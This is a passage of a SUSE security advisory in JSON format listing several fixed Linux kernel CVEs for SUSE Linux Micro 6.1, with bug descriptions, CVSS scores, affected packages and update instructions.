"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-40042"
},
{
"cve": "CVE-2025-40053",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40053"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: dlink: handle copy_thresh allocation failure\n\nThe driver did not handle failure of `netdev_alloc_skb_ip_align()`.\nIf the allocation failed, dereferencing `skb-\u003eprotocol` could lead to\na NULL pointer dereference.\n\nThis patch tries to allocate `skb`. If the allocation fails, it falls\nback to the normal path.\n\nTested-on: D-Link DGE-550T Rev-A3",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40053",
"url": "https://www.suse.com/security/cve/CVE-2025-40053"
},
{
"category": "external",
"summary": "SUSE Bug 1252808 for CVE-2025-40053",
"url": "https://bugzilla.suse.com/1252808"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-40053"
},
{
"cve": "CVE-2025-40081",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40081"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nperf: arm_spe: Prevent overflow in PERF_IDX2OFF()\n\nCast nr_pages to unsigned long to avoid overflow when handling large\nAUX buffer sizes (\u003e= 2 GiB).",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40081",
"url": "https://www.suse.com/security/cve/CVE-2025-40081"
},
{
"category": "external",
"summary": "SUSE Bug 1252776 for CVE-2025-40081",
"url": "https://bugzilla.suse.com/1252776"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-40081"
},
{
"cve": "CVE-2025-40097",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40097"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nALSA: hda: Fix missing pointer check in hda_component_manager_init function\n\nThe __component_match_add function may assign the \u0027matchptr\u0027 pointer\nthe value ERR_PTR(-ENOMEM), which will subsequently be dereferenced.\n\nThe call stack leading to the error looks like this:\n\nhda_component_manager_init\n|-\u003e component_match_add\n |-\u003e component_match_add_release\n |-\u003e __component_match_add ( ... ,**matchptr, ... )\n |-\u003e *matchptr = ERR_PTR(-ENOMEM); // assign\n|-\u003e component_master_add_with_match( ... match)\n |-\u003e component_match_realloc(match, match-\u003enum); // dereference\n\nAdd IS_ERR() check to prevent the crash.\n\nFound by Linux Verification Center (linuxtesting.org) with SVACE.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40097",
"url": "https://www.suse.com/security/cve/CVE-2025-40097"
},
{
"category": "external",
"summary": "SUSE Bug 1252900 for CVE-2025-40097",
"url": "https://bugzilla.suse.com/1252900"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-40097"
},
{
"cve": "CVE-2025-40102",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40102"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nKVM: arm64: Prevent access to vCPU events before init\n\nAnother day, another syzkaller bug. KVM erroneously allows userspace to\npend vCPU events for a vCPU that hasn\u0027t been initialized yet, leading to\nKVM interpreting a bunch of uninitialized garbage for routing /\ninjecting the exception.\n\nIn one case the injection code and the hyp disagree on whether the vCPU\nhas a 32bit EL1 and put the vCPU into an illegal mode for AArch64,\ntripping the BUG() in exception_target_el() during the next injection:\n\n kernel BUG at arch/arm64/kvm/inject_fault.c:40!\n Internal error: Oops - BUG: 00000000f2000800 [#1] SMP\n CPU: 3 UID: 0 PID: 318 Comm: repro Not tainted 6.17.0-rc4-00104-g10fd0285305d #6 PREEMPT\n Hardware name: linux,dummy-virt (DT)\n pstate: 21402009 (nzCv daif +PAN -UAO -TCO +DIT -SSBS BTYPE=--)\n pc : exception_target_el+0x88/0x8c\n lr : pend_serror_exception+0x18/0x13c\n sp : ffff800082f03a10\n x29: ffff800082f03a10 x28: ffff0000cb132280 x27: 0000000000000000\n x26: 0000000000000000 x25: ffff0000c2a99c20 x24: 0000000000000000\n x23: 0000000000008000 x22: 0000000000000002 x21: 0000000000000004\n x20: 0000000000008000 x19: ffff0000c2a99c20 x18: 0000000000000000\n x17: 0000000000000000 x16: 0000000000000000 x15: 00000000200000c0\n x14: 0000000000000000 x13: 0000000000000000 x12: 0000000000000000\n x11: 0000000000000000 x10: 0000000000000000 x9 : 0000000000000000\n x8 : ffff800082f03af8 x7 : 0000000000000000 x6 : 0000000000000000\n x5 : ffff800080f621f0 x4 : 0000000000000000 x3 : 0000000000000000\n x2 : 000000000040009b x1 : 0000000000000003 x0 : ffff0000c2a99c20\n Call trace:\n exception_target_el+0x88/0x8c (P)\n kvm_inject_serror_esr+0x40/0x3b4\n __kvm_arm_vcpu_set_events+0xf0/0x100\n kvm_arch_vcpu_ioctl+0x180/0x9d4\n kvm_vcpu_ioctl+0x60c/0x9f4\n __arm64_sys_ioctl+0xac/0x104\n invoke_syscall+0x48/0x110\n el0_svc_common.constprop.0+0x40/0xe0\n do_el0_svc+0x1c/0x28\n el0_svc+0x34/0xf0\n el0t_64_sync_handler+0xa0/0xe4\n el0t_64_sync+0x198/0x19c\n Code: f946bc01 b4fffe61 9101e020 17fffff2 (d4210000)\n\nReject the ioctls outright as no sane VMM would call these before\nKVM_ARM_VCPU_INIT anyway. Even if it did the exception would\u0027ve been\nthrown away by the eventual reset of the vCPU\u0027s state.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40102",
"url": "https://www.suse.com/security/cve/CVE-2025-40102"
},
{
"category": "external",
"summary": "SUSE Bug 1252919 for CVE-2025-40102",
"url": "https://bugzilla.suse.com/1252919"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 0,
"baseSeverity": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:N",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-40102"
},
{
"cve": "CVE-2025-40106",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40106"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ncomedi: fix divide-by-zero in comedi_buf_munge()\n\nThe comedi_buf_munge() function performs a modulo operation\n`async-\u003emunge_chan %= async-\u003ecmd.chanlist_len` without first\nchecking if chanlist_len is zero. If a user program submits a command with\nchanlist_len set to zero, this causes a divide-by-zero error when the device\nprocesses data in the interrupt handler path.\n\nAdd a check for zero chanlist_len at the beginning of the\nfunction, similar to the existing checks for !map and\nCMDF_RAWDATA flag. When chanlist_len is zero, update\nmunge_count and return early, indicating the data was\nhandled without munging.\n\nThis prevents potential kernel panics from malformed user commands.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40106",
"url": "https://www.suse.com/security/cve/CVE-2025-40106"
},
{
"category": "external",
"summary": "SUSE Bug 1252891 for CVE-2025-40106",
"url": "https://bugzilla.suse.com/1252891"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
